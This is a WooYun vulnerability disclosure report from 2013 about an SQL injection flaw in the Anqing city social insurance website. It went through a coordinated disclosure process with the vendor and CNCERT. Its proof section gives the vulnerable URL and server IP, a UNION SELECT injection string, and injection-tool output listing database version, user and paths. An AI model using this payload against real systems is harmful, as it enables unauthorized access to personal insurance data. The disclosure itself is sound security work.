当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-016936

漏洞标题:安庆市社会保险信息网SQL注入漏洞

相关厂商:安庆市社会保险信息网

漏洞作者: 幻客

提交时间:2013-07-05 15:57

修复时间:2013-08-19 15:58

公开时间:2013-08-19 15:58

漏洞类型:SQL注射漏洞

危害等级:低

自评Rank:5

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-05: 细节已通知厂商并且等待厂商处理中
2013-07-09: 厂商已经确认,细节仅向厂商公开
2013-07-19: 细节向核心白帽子及相关领域专家公开
2013-07-29: 细节向普通白帽子公开
2013-08-08: 细节向实习白帽子公开
2013-08-19: 细节向公众公开

简要描述:

安庆市社会保险信息网SQL注入漏洞
由于本人也是安庆人,看了看安庆的一些政府网站(没有干坏事)发现了安庆市社会保险信息网
存在sql注入漏洞,为了发扬政府网站不被入侵以及被恶意破坏的高尚的风格,特地来乌云提交一下漏洞,希望乌云通知政府网站,让乌云通知安庆市的政府总比我自己通知的好,这个我不多说,大家都懂的,呵呵

详细说明:

安庆市社会保险信息网SQL注入漏洞

漏洞证明:

存在注入的地址:http://www.aqshbx.gov.cn/special.php?action=show&id=1
■注入点信息:============================================================
·URL:http://www.aqshbx.gov.cn/special.php?action=show&id=1
·页面标题:瀹夊簡甯傜ぞ浼氫繚闄╀俊鎭綉
·参数:action=show&id=1
·提交方式:GET
·注入类型:文本型
·注入方式:And
·页面类型:php
·IP地址:218.23.241.134
·数据库类型:MySQL
·HEAD
HTTP/1.1 200 OK
Connection: close
Date: Fri, 04 Jan 2013 21:25:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
总列数:13
显示的列:3
联合查询SQL:' and 3=8 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 -- And '8'='8
基本信息:============================================================
- version():5.1.29-rc-community
- database():aqsbj
- user():aqsbj@localhost
- session_user():aqsbj@localhost
- current_user():aqsbj@localhost
- system_user():aqsbj@localhost
- @@basedir:D:\mysql5\
- @@datadir:D:\mysql5\Data\
- @@tmpdir:C:\WINDOWS\TEMP
- @@version_compile_os:Win32
- 可否使用单引号:yes
- 有INFORMATION_SCHEMA :yes
■ 数据库列表:
数据库名 默认字符集名
------------------------------------------------------------
记录数:2
■ mysql 的表:
表名 总记录数
------------------------------------------------------------
获取记录数失败,使用预设值:5
记录数:5
■ 数据库列表:
数据库名 默认字符集名
------------------------------------------------------------
记录数:2
■ mysql 的表:
表名 总记录数
------------------------------------------------------------
获取记录数失败,使用预设值:5
记录数:5
■ mysql.db 的字段:
列名 数据类型 字符集名
------------------------------------------------------------
获取记录数失败,使用预设值:5
记录数:5
总列数:13
显示的列:3
联合查询SQL:' and 3=8 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 -- And '8'='8

修复方案:


网站的管理员比我懂修复方法,这里就不多说了

版权声明:转载请注明来源 幻客@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-07-09 23:30

厂商回复:

最新状态:

暂无


漏洞评价:

评论